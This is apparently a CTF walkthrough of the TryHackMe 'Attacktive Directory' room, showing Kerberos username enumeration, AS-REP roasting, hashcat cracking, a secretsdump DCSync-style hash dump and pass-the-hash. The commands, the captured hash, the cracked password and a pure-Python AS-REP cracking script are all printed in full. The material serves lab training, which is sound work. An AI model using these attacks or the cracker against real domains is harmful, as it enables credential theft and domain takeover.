Introduction
Task 1: Deploy The Machine
This task covers the OpenVPN setup.
If you haven't done it yet, setting it up first makes the rest of the room much easier to work through.
Task 2: Setup
This task walks through installing the following three tools:
- Impacket
- Bloodhound
- Neo4j
Task 3: Welcome to Attacktive Directory
This is where the real work starts.
What tool will allow us to enumerate port 139/445?
Ports 139/445 are SMB (NetBIOS session service and SMB over TCP). The tool for pulling details out of SMB is enum4linux.
What is the NetBIOS-Domain Name of the machine?
From the enum4linux output the domain name is THM-AD (the full output is under "enum4linux output" at the end of this post).
NetBIOS is an early name-resolution mechanism for Windows networks, used mainly within a local network.
Like Active Directory it has a domain name, but the NetBIOS domain name (THM-AD, the short name) is distinct from the AD DNS domain name (spookysec.local, which the LDAP banner in the nmap output gives away).
What invalid TLD do people commonly use for their Active Directory Domain?
I didn't know much about this, so I looked it up: .local is the one people commonly use. It isn't a valid public TLD; it is reserved for multicast DNS (RFC 6762), which is why it collides with mDNS resolution on clients.
Task 4: Enumerating Users via Kerberos
kerbrute wasn't installed, so I installed it with the following steps:
- Install Golang (only needed if you build from source; the prebuilt release binary below runs without it)
sudo apt install golang
- Download the release binary
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.2/kerbrute_linux_amd64
- Rename it
mv kerbrute_linux_amd64 kerbrute
- Make it executable
chmod +x kerbrute
What command within Kerbrute will allow us to enumerate valid usernames?
Running kerbrute with no arguments prints its help. The subcommand for finding usernames is userenum (it is a subcommand, not a flag), which is what the question is after.
What notable account is discovered? (These should jump out at you)
I hadn't used this binary much and had trouble working out which argument goes where, but following a writeup got the command running.
Incidentally, the AD domain name had been sitting in the nmap output all along (easy to miss):
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
(Going by the expected answer length) I picked svc-admin.
What is the other notable account is discovered? (These should jump out at you)
(Going by the length again) I picked backup.
To give a serious answer: backup data comes in many forms, so an account named backup is likely to be very useful (allegedly).
Task 5: Abusing Kerberos
From here on we actually attack Kerberos.
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
GetNPUsers.py (from Impacket) does this. It asks the KDC for an AS-REP for a given account without sending pre-authentication. For accounts that have "Do not require Kerberos preauthentication" (UF_DONT_REQUIRE_PREAUTH) set, the KDC answers anyway, and the enc-part of that AS-REP is encrypted with the user's long-term key, so it can be cracked offline (AS-REP roasting).
Let's run it against the two accounts enumerated in the previous task:
┌──(root㉿kali)-[/opt/impacket/examples]
└─# python3 GetNPUsers.py -dc-ip 10.10.218.113 -no-pass spookysec.local/backup
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for backup
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(root㉿kali)-[/opt/impacket/examples]
└─# python3 GetNPUsers.py -dc-ip 10.10.218.113 -no-pass spookysec.local/svc-admin
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:3f872f2d8f01ca7b43b17652504d8d99$31989073ed469875c846fb485b7703c38925466d801416d6f28fff0306e9d9fba9213f36142c9f056b30e948f15bd5285b1d546a174209517db95f134893c7bfb9410d2d36c6b440d5af53965559628db27aeae9279c32efbfdda0476c1c1dd86e96b71bf12edd65e0779f67cf7c3d4d5724a65b06f2327b900d3371905a9457203fc9d249b34366c2fbe439b28b73df658ad297d7aa8402698dc83b69248333c228fe77027b3b81a91f81b2f6f6e5319869602dd08dac7e473632083c0ee91711f1d655a013c3d362ac73c7c68dbb8c614b73e1175e4094612212a85a9118a11f432dbc56895ac072c217aaf117ff5a85fa
svc-admin is the one that hits. backup is rejected because it still requires pre-authentication, which is exactly what the UF_DONT_REQUIRE_PREAUTH message says.
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
The $krb5asrep$23$ prefix is the distinctive part: 23 is the Kerberos encryption type (RC4-HMAC). Hashcat's example-hashes wiki page lists this format under the name "Kerberos 5, etype 23, AS-REP" (hashcat prints the same name in the Hash.Mode line of the crack log below).
What mode is the hash?
The mode is the number passed with -m. It tells hashcat which hash format to parse and which kernel to crack it with; for this format it is 18200.
Now crack the hash with the modified password list provided, what is the user accounts password?
Put svc-admin's hash in hash_svc-admin.txt and run hashcat against passwordlist.txt, the list distributed on the TryHackMe page:
hashcat -m 18200 hash_svc-admin.txt passwordlist.txt
The password came out of the hash without trouble.
(Full output under "Cracking the svc-admin hash" below.)
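To see what hashcat mode 18200 is actually checking on every candidate, here is the same verification reimplemented in pure Python. This is an added example, not code from the original writeup, from Impacket or from hashcat; the only input taken from this page is the svc-admin AS-REP line printed by GetNPUsers.py above, and the five-word list is a constructed stand-in for passwordlist.txt. MD4 (for the NT hash), RC4 and the RFC 4757 HMAC-MD5 key derivation are implemented inline so it runs offline.

```python
"""What hashcat mode 18200 checks for each candidate password, reimplemented
in pure Python for a $krb5asrep$23$ (RC4-HMAC) hash. Added example; the
only input taken from the page is the svc-admin AS-REP line."""
import hashlib
import hmac
import re
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. The NT hash is MD4(UTF-16LE(password)) and hashlib
    usually lacks md4 under OpenSSL 3, so it is implemented here."""
    f = lambda x, y, z: (x & y) | (~x & z)           # round 1
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)  # round 2 (majority)
    h = lambda x, y, z: x ^ y ^ z                    # round 3
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        blk = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for func, const, shifts, order in rounds:
            for i, idx in enumerate(order):
                p = (-i) % 4  # a, d, c, b are updated in turn
                v[p] = rotl((v[p] + func(v[(p + 1) % 4], v[(p + 2) % 4], v[(p + 3) % 4])
                             + blk[idx] + const) & MASK, shifts[i % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # keystream generation, XORed into the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?:23\$)?(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<cksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$")


def parse_asrep_hash(line: str):
    """Split the GetNPUsers.py/hashcat line into user, realm, 16-byte HMAC
    checksum and the RC4 ciphertext of the AS-REP enc-part."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$23$ line")
    return m["user"], m["realm"], bytes.fromhex(m["cksum"]), bytes.fromhex(m["edata"])


def asrep_password_matches(cksum: bytes, edata: bytes, password: str) -> bool:
    """RFC 4757 decrypt-and-verify. Key usage 8: RFC 4757 notes that Windows
    uses 8 for the AS-REP enc-part where RFC 4120 says 3; with 3 nothing matches."""
    k1 = hmac.new(nt_hash(password), struct.pack("<I", 8), hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    plaintext = rc4(k3, edata)  # 8-byte confounder || DER EncASRepPart
    return hmac.compare_digest(hmac.new(k1, plaintext, hashlib.md5).digest(), cksum)


def crack_asrep(line: str, candidates):
    """Return the first candidate whose NT hash verifies the AS-REP, else None."""
    _user, _realm, cksum, edata = parse_asrep_hash(line)
    for pw in candidates:
        pw = pw.rstrip("\r\n")
        if asrep_password_matches(cksum, edata, pw):
            return pw
    return None


# The AS-REP for svc-admin exactly as GetNPUsers.py printed it on this page.
SVC_ADMIN_ASREP = (
    "$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:3f872f2d8f01ca7b43b17652504d8d99$"
    "31989073ed469875c846fb485b7703c38925466d801416d6f28fff0306e9d9fb"
    "a9213f36142c9f056b30e948f15bd5285b1d546a174209517db95f134893c7bf"
    "b9410d2d36c6b440d5af53965559628db27aeae9279c32efbfdda0476c1c1dd8"
    "6e96b71bf12edd65e0779f67cf7c3d4d5724a65b06f2327b900d3371905a9457"
    "203fc9d249b34366c2fbe439b28b73df658ad297d7aa8402698dc83b69248333"
    "c228fe77027b3b81a91f81b2f6f6e5319869602dd08dac7e473632083c0ee917"
    "11f1d655a013c3d362ac73c7c68dbb8c614b73e1175e4094612212a85a9118a1"
    "1f432dbc56895ac072c217aaf117ff5a85fa")
# Constructed five-word list standing in for passwordlist.txt.
SAMPLE_WORDLIST = ["horoscope", "Password1", "spooky2024", "management2005", "amy123"]

if __name__ == "__main__":
    print(crack_asrep(SVC_ADMIN_ASREP, SAMPLE_WORDLIST))
```

Two points worth noticing. The check is purely the HMAC-MD5 over the decrypted confounder plus plaintext, so no ASN.1 parsing of the EncASRepPart is needed; and the 8-byte confounder is random per response, which is why two AS-REPs for the same account give different hash lines that still crack to the same password. Getting the key usage wrong (3 instead of 8) is the classic mistake when reimplementing this: every candidate then fails, including the right one.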
Task 6: Back to the Basics
What utility can we use to map remote SMB shares?
smbclient. smbmap is also commonly used for the same job.
Which option will list shares?
The output of smbclient -h (shown as a screenshot in the original) lists the options; the one that lists the server's shares is -L.
How many remote shares is the server listing?
There is one particular share that we have access to that contains a text file. Which share is it?
Trying them from the top, backup was the one I could access.
What is the content of the file?
Decoding the contents of the file, what is the full contents?
Decode it with a tool such as DenCode.
That yields the credentials for the backup account.
Task 7: Elevating Privileges within the Domain
Now we gather what we need to escalate privileges.
What method allowed us to dump NTDS.DIT?
Given where the story was heading I assumed secretsdump.py, so I started with -h.
The usage syntax (the red box in the original screenshot) mentions NTDS.DIT, and running it in that form worked.
I hadn't come across NTDS.DIT before: it is the Active Directory database file, holding the user objects, groups and password hashes. secretsdump.py does not read the file itself; using the backup account's credentials it asks the DC to replicate the secrets over the DRSUAPI (MS-DRSR) replication interface, the same mechanism a DCSync attack uses, which only works because that account has replication rights on the domain.
What is the Administrators NTLM hash?
Several hash-like values are printed for Administrator; I matched their shape against the NTLM entry on Hashcat's Example Hashes page (by hand). The NTLM lines follow secretsdump's domain\user:RID:LMhash:NThash::: layout, so the NT hash is the fourth colon-separated field; the aes256/aes128/des lines further down are Kerberos keys, not NTLM.
What method of attack could allow us to authenticate as the user without the password?
Sorry, I googled this one: pass-the-hash. NTLM authentication proves possession of the NT hash, not the password, so the dumped hash is enough to log in.
Using a tool called Evil-WinRM what option will allow us to use a hash?
I installed Evil-WinRM following a Qiita article.
The command below prints the option list (shown as a screenshot in the original); the hash-related option is -H (--hash), which takes the NT hash from the previous step.
evil-winrm -h
WinRM listens on port 5985 (5986 for HTTPS). Note that the nmap scan reproduced in the notes below does not list it, since it only covers the default port set, so check it explicitly (for example with -p 5985,5986) before relying on it.
Task 8: Flag Submission Panel
Honestly, this is where I got bogged down.
I had assumed there were three separate accounts to log in with via Evil-WinRM, but in fact you log in as Administrator once and then change directory to read the other users' flags.
I should have read the question text properly.
Conclusion
The two things I learned this time:
- If ports 139/445 are open, try enum4linux.
- If Kerberos is running, attack it in the following order (CTF environments only) (corrections welcome):
  - Enumerate usernames with kerbrute's userenum subcommand.
  - AS-REP roast with Impacket's GetNPUsers.py to get a crackable hash for any account that does not require pre-authentication, then crack it with hashcat -m 18200.
  - Once you hold a credential with enough rights (here the backup account's, recovered from the SMB share), dump every account's username and password hash with secretsdump.py.
  - Log in with Evil-WinRM using the Administrator NT hash from the previous step (pass-the-hash via -H).
Notes
Nmap results
# nmap -sV -O -script vuln 10.10.57.238 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 17:16 JST
Nmap scan report for 10.10.57.238
Host is up (0.25s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-14 08:22:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3389/tcp open ms-wbt-server Microsoft Terminal Services
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=10/14%OT=53%CT=1%CU=38566%PV=Y%DS=2%DC=I%G=Y%TM=670
OS:CD85C%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=108%TI=I%II=I%SS=S%TS=U)
OS:SEQ(SP=FE%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=FE%GCD=1%ISR=108
OS:%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=FE%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS
OS:=U)SEQ(SP=FE%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M508NW8NNS%O2
OS:=M508NW8NNS%O3=M508NW8%O4=M508NW8NNS%O5=M508NW8NNS%O6=M508NNS)WIN(W1=FFF
OS:F%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M50
OS:8NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=
OS:)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:O%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%D
OS:F=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=
OS:G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1257.51 seconds
enum4linux output
# enum4linux -a 10.10.57.238
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Oct 14 17:41:08 2024
=========================================( Target Information )=========================================
Target ........... 10.10.57.238
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.57.238 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.57.238 )================================
Looking up status of 10.10.57.238
No reply from 10.10.57.238
===================================( Session Check on 10.10.57.238 )===================================
[+] Server 10.10.57.238 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.57.238 )================================
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.57.238 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.57.238 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 10.10.57.238 )=======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
=================================( Share Enumeration on 10.10.57.238 )=================================
do_connect: Connection to 10.10.57.238 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.57.238
============================( Password Policy Information for 10.10.57.238 )============================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.57.238 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.57.238)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
=======================================( Groups on 10.10.57.238 )=======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.57.238 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-5-21-3591857110-2884097990-301047963
[I] Found new SID:
S-1-5-21-3591857110-2884097990-301047963
[+] Enumerating users using SID S-1-5-21-3591857110-2884097990-301047963 and logon username '', password ''
S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)
S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)
S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
[+] Enumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username '', password ''
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)
===============================( Getting printer info for 10.10.57.238 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Mon Oct 14 17:56:34 2024
Cracking the svc-admin hash
┌──(root㉿kali)-[/home/…/Documents/THM/Medium/AttacktiveDirectory]
└─# hashcat -m 18200 hash_svc-admin.txt passwordlist.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-12th Gen Intel(R) Core(TM) i5-12450H, 1439/2942 MB (512 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:3f872f2d8f01ca7b43b17652504d8d99$31989073ed469875c846fb485b7703c38925466d801416d6f28fff0306e9d9fba9213f36142c9f056b30e948f15bd5285b1d546a174209517db95f134893c7bfb9410d2d36c6b440d5af53965559628db27aeae9279c32efbfdda0476c1c1dd86e96b71bf12edd65e0779f67cf7c3d4d5724a65b06f2327b900d3371905a9457203fc9d249b34366c2fbe439b28b73df658ad297d7aa8402698dc83b69248333c228fe77027b3b81a91f81b2f6f6e5319869602dd08dac7e473632083c0ee91711f1d655a013c3d362ac73c7c68dbb8c614b73e1175e4094612212a85a9118a11f432dbc56895ac072c217aaf117ff5a85fa:management2005
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:3f872f2d8f0...5a85fa
Time.Started.....: Mon Oct 14 21:28:33 2024 (0 secs)
Time.Estimated...: Mon Oct 14 21:28:33 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 394.3 kH/s (0.93ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6656/70188 (9.48%)
Rejected.........: 0/6656 (0.00%)
Restore.Point....: 6144/70188 (8.75%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: horoscope -> amy123
Hardware.Mon.#1..: Util: 47%
Started: Mon Oct 14 21:28:11 2024
Stopped: Mon Oct 14 21:28:35 2024